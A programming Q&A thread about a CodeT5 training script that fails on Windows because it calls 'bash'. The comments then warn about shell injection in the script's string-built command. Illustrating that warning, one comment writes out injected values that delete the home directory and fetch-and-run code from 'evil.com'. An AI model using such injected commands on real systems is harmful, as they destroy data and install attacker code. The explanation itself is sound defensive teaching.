# "bash" is not recognized as an internal or external command

Tags: python, bash

I'm trying to install this 'https://github.com/salesforce/CodeT5'

pip install ok, pull from git ok, execute from cmd 'python run_exp.py --model_tag codet5_base --task summarize --sub_task python' and got this message in console:
============================Start Running==========================
bash exp_with_args.sh summarize python codet5_base 0 -1 48 5 256 128 2 15 1000 saved_models tensorboard results/summarize_codet5_base.txt

"bash" no se reconoce como un comando interno o externo,
programa o archivo por lotes ejecutable.

Installed powershell and executed from it but same error...

apparently there's a line in run_exp.py:

```
def get_cmd(task, sub_task, model_tag, gpu, data_num, bs, lr, source_length, target_length, patience, epoch, warmup,
            model_dir, summary_dir, res_fn, max_steps=None, save_steps=None, log_steps=None):
    if max_steps is None:
        cmd_str = 'bash exp_with_args.sh %s %s %s %d %d %d %d %d %d %d %d %d %s %s %s' % \
                  (task, sub_task, model_tag, gpu, data_num, bs, lr, source_length, target_length, patience, epoch,
                   warmup, model_dir, summary_dir, res_fn)
    else:
        cmd_str = 'bash exp_with_args.sh %s %s %s %d %d %d %d %d %d %d %d %d %s %s %s %d %d %d' % \
                  (task, sub_task, model_tag, gpu, data_num, bs, lr, source_length, target_length, patience, epoch,
                   warmup, model_dir, summary_dir, res_fn, max_steps, save_steps, log_steps)
    return cmd_str
```

cmd_str = 'bash exp_with_args.sh ...' breaks code but I don't know why

thank you!

I searched for hours but I coudn't find any answer that solves the problem

Comment: Means exactly what it says. You're on Windows. Windows doesn't come with bash by default.

Comment: Also, this code has serious security problems and shouldn't be used, even on UNIXy platforms where it _does_ work. If a task were passed in with `$(rm -rf ~)` as its name, whoever owns the account this is running as would have a _very_ bad day.

Comment: I'm not sure if you are talking like a security thread or just that the developer had a bad day on this like of code?

Comment: Not sure what you mean by "security thread", but anyone who knows what a shell injection attack is will never write `cmd_str = '... %s %s %s ...' % (thing, other_thing, so_forth)`

Comment: If _any_ of your `%s`-type parameters are strings that could be influenced by an attacker, they make an input directory be named be, say, `/uploads/$(rm -rf ~)` and the person who runs this code next gets their home directory deleted. Or `/uploads/$(curl evil.com/runme.sh | sh)/` and you end up with a rootkit, etc. (That means `/uploads` containing a directory named `$(curl evil.com`, and that directory containing a subdirectory `runme.sh | sh)`; all of those perfectly legal names on UNIXy systems)

Comment: ...the correct and safe way to do it is to create a command _list_, not a command _string_; `['bash', 'exp_with_args.sh', task, model_tag, gpu, str(data_num), ...]` can be passed to `subprocess.call()` or similar safely (without `shell=True`).

Comment: (mind, it's not good practice to pass `bash` as a separate argument at all; better to take off the [misleading extension](https://www.talisman.org/~erlkonig/documents/commandname-extensions-considered-harmful/) and run `./exp_with_args` as your command and lets its shebang line choose an interpreter; that way its author could switch from writing it in bash to Python or C or any other language they like and the code invoking the executable doesn't need to care).